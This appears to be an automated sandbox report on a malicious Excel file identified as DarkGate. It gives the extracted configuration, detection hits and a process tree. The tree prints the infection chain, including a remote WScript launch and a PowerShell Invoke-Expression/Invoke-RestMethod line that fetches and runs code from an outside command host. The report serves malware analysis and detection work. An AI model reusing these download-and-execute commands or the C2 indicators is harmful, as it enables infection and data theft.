Analysis
-
max time kernel
598s -
max time network
587s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
10-04-2024 18:36
Static task
static1
General
-
Target
4_10_AC-3010.xlsx
-
Size
51KB
-
MD5
7c265753eddf8443ad04c994b063f622
-
SHA1
a770cd22f58c78979d689f1db45ec05973e2d815
-
SHA256
c0bdda3b38fb62f8de43d24640c8db5f0e883836d704041dd1f7c338f2709d02
-
SHA512
7aacf817f45072c20e27f544e1f9464a3db0849a7797fe9a247455c9301c16af3077b45729da03b731c2cc1a75c7d29717abc8e0515511336067da829167a10e
-
SSDEEP
1536:4s1eZDHgM8v42wkYq84lKL7IAnA4xCQH140sXe:V1eZcMetF8T7IAA4xprsu
Malware Config
Extracted
darkgate
admin888
wassonite.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
jdfEdKYT
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 8 IoCs
resource yara_rule behavioral1/memory/3436-254-0x00000000030D0000-0x0000000003144000-memory.dmp family_darkgate_v6 behavioral1/memory/3436-255-0x00000000030D0000-0x0000000003144000-memory.dmp family_darkgate_v6 behavioral1/memory/964-323-0x00000000045D0000-0x0000000004644000-memory.dmp family_darkgate_v6 behavioral1/memory/964-325-0x00000000045D0000-0x0000000004644000-memory.dmp family_darkgate_v6 behavioral1/memory/1536-382-0x0000000004560000-0x00000000045D4000-memory.dmp family_darkgate_v6 behavioral1/memory/1536-384-0x0000000004560000-0x00000000045D4000-memory.dmp family_darkgate_v6 behavioral1/memory/796-443-0x0000000002CF0000-0x0000000002D64000-memory.dmp family_darkgate_v6 behavioral1/memory/796-444-0x0000000002CF0000-0x0000000002D64000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2940 4532 WScript.exe 71 -
Blocklisted process makes network request 16 IoCs
flow pid Process 22 2720 powershell.exe 24 2720 powershell.exe 25 2720 powershell.exe 26 2720 powershell.exe 42 3900 powershell.exe 43 3900 powershell.exe 44 3900 powershell.exe 45 3900 powershell.exe 46 4588 powershell.exe 47 4588 powershell.exe 48 4588 powershell.exe 49 4588 powershell.exe 54 4624 powershell.exe 55 4624 powershell.exe 56 4624 powershell.exe 57 4624 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 3436 AutoHotkey.exe 964 AutoHotkey.exe 1536 AutoHotkey.exe 796 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4532 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2720 powershell.exe 2720 powershell.exe 2720 powershell.exe 3436 AutoHotkey.exe 3436 AutoHotkey.exe 3900 powershell.exe 3900 powershell.exe 3900 powershell.exe 964 AutoHotkey.exe 964 AutoHotkey.exe 4588 powershell.exe 4588 powershell.exe 4588 powershell.exe 1536 AutoHotkey.exe 1536 AutoHotkey.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 796 AutoHotkey.exe 796 AutoHotkey.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4624 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4532 EXCEL.EXE 4532 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE 4532 EXCEL.EXE -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 4532 wrote to memory of 2940 4532 EXCEL.EXE 74 PID 4532 wrote to memory of 2940 4532 EXCEL.EXE 74 PID 2940 wrote to memory of 2720 2940 WScript.exe 75 PID 2940 wrote to memory of 2720 2940 WScript.exe 75 PID 2720 wrote to memory of 3436 2720 powershell.exe 77 PID 2720 wrote to memory of 3436 2720 powershell.exe 77 PID 2720 wrote to memory of 3436 2720 powershell.exe 77 PID 2720 wrote to memory of 1596 2720 powershell.exe 78 PID 2720 wrote to memory of 1596 2720 powershell.exe 78 PID 796 wrote to memory of 3900 796 WScript.exe 83 PID 796 wrote to memory of 3900 796 WScript.exe 83 PID 3900 wrote to memory of 964 3900 powershell.exe 85 PID 3900 wrote to memory of 964 3900 powershell.exe 85 PID 3900 wrote to memory of 964 3900 powershell.exe 85 PID 3900 wrote to memory of 3152 3900 powershell.exe 86 PID 3900 wrote to memory of 3152 3900 powershell.exe 86 PID 1132 wrote to memory of 4588 1132 WScript.exe 89 PID 1132 wrote to memory of 4588 1132 WScript.exe 89 PID 4588 wrote to memory of 1536 4588 powershell.exe 91 PID 4588 wrote to memory of 1536 4588 powershell.exe 91 PID 4588 wrote to memory of 1536 4588 powershell.exe 91 PID 4588 wrote to memory of 1456 4588 powershell.exe 92 PID 4588 wrote to memory of 1456 4588 powershell.exe 92 PID 2260 wrote to memory of 4624 2260 WScript.exe 97 PID 2260 wrote to memory of 4624 2260 WScript.exe 97 PID 4624 wrote to memory of 796 4624 powershell.exe 99 PID 4624 wrote to memory of 796 4624 powershell.exe 99 PID 4624 wrote to memory of 796 4624 powershell.exe 99 PID 4624 wrote to memory of 1756 4624 powershell.exe 100 PID 4624 wrote to memory of 1756 4624 powershell.exe 100 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3152 attrib.exe 1456 attrib.exe 1756 attrib.exe 1596 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4_10_AC-3010.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.JS"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\ciie\AutoHotkey.exe"C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3436
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/ciie/4⤵
- Views/modifies file attributes
PID:1596
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s fdPHost1⤵PID:4500
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"1⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\ciie\AutoHotkey.exe"C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:964
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/ciie/3⤵
- Views/modifies file attributes
PID:3152
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1336
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"1⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\ciie\AutoHotkey.exe"C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1536
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/ciie/3⤵
- Views/modifies file attributes
PID:1456
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\ciie\AutoHotkey.exe"C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:796
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/ciie/3⤵
- Views/modifies file attributes
PID:1756
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD52c64aa22536612920da5641216f191f8
SHA1debe1b1206f3f61f39df0a0926f939c1b912ef82
SHA2565e94bb78213ae5e7c4c84af6f4502a9c3b37c6eac26ca846fe474349149e2b22
SHA5127f01f5c2bd13faecd1992fcad6fccf04dd67946687881e33e502fea33bdcf70da7042867ec216fc7c83bd43d6b17ccf16e9a72f336c1977732444afd4920d2b2
-
Filesize
1KB
MD548a092f761309162570e3d80876262c7
SHA158b1b3249349c026959f002abc937148ceeb6a7d
SHA256f93d925460b45df058b528349080b463f70cca8ab66169bfd0eab43a99e1c282
SHA512640b24ac6a9e912fa59d019b555306830cce9223829a368790eaf63ef5ac316a4a99fc8cd9df44cdc1e22e564fd97a922f7f0b5d8109d1d9683d6a33f121e955
-
Filesize
1KB
MD514193d1feddf6a13e4f4a181c300272d
SHA1ec7e4fb4721f3181bd98b5a25be090fd44571ec5
SHA256f36abe571d6703ee2b71bd575f41bec16bf207ea9ac999c288fb9b81f4e2e0bf
SHA51203ff678f06b971545c34f7b362bb2952f21b5d6ae0329465d006c40807a0965a74336f2cdda0f3983a5e4a49237dbab094bd750c726b4041a21619f18e10ee5d
-
Filesize
1KB
MD506c99963d244116928dbb26336c13e42
SHA1de38182b9e203347bcf10844bc9cd78e3fbb4b4c
SHA256f5eb8a80b94188a90da8b4211aa09bd6206ba844c678e736d9c3ab93f3d0ecfb
SHA512f454ffadbaeb798f3d646eb40a1534b15b4c5b471635f86176eb082ca36512e3034258cb7261221d343f92f4f41a2ab9bb41465c16681a97a694d6e4a2a91c7f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
32B
MD5d59c7d5fed873c48053850920ccdd442
SHA1a80343cb8bacb5da2b42de59456c15fc16d17d37
SHA2566732db16e43d0b606f9e275dfd8a37ad1aac7df27cdcf4181a5f0c3a5e294ebd
SHA512fbe8f3c0580298a06ef40212fad7a0f0592163100bf2ddac039a6deabb017910d0c5e1ebd1c36e022f694b458d78f571b5cd1401900c1b2a607ac08c11d74f17
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
441B
MD5a2f4ba569825d00dbbb62fd64104e0e3
SHA145687aac5b0031d2063c466fa3fee6f813e92441
SHA2568fca9dd75bac6406d6acd04ad98ee58c31e112fc3352199ebdc45f0347601791
SHA5125a7825f6d47a7f5f7c198a2b34a8bd08a422b22753239b8ec6307d6e22c8c544ae54765f9954706f3e99976c28ad6085d78d88c92a650ce86e88f9751c486cc3
-
Filesize
924KB
MD5dcb6148e6a4d5c89ab44a23b4edebeeb
SHA1542839b03a18f57efe10dc318d8947a31a3ee61a
SHA2560e64aabd9ea8afb2f01925c2eb06bf2bb57d1b09e7971e653a7256c56775a634
SHA512ac7359c8b85eeb86ae742c2e8ad2788314248dd26b5f37889ea9660282538716db7fca96b48a287b087c0ca669c1c0e8ce6b19278268a53eddd99dc1b24ac85d
-
Filesize
1KB
MD514239923c5a76ba044e15b90a22eaad1
SHA1113ec554dc3f16e6cd27eab90b64632c78740e6e
SHA25623638ad327816951151b870fa572a8cb7b009926d5746b2206b17b1e03151cc0
SHA512f1eaaf9d56863e067eda231e299bed48660e609ba8cad84f8e6087920f47c2add22241145ef1b5ef27c92128756173df0d2d9a8ef474d20916a83733b2327a04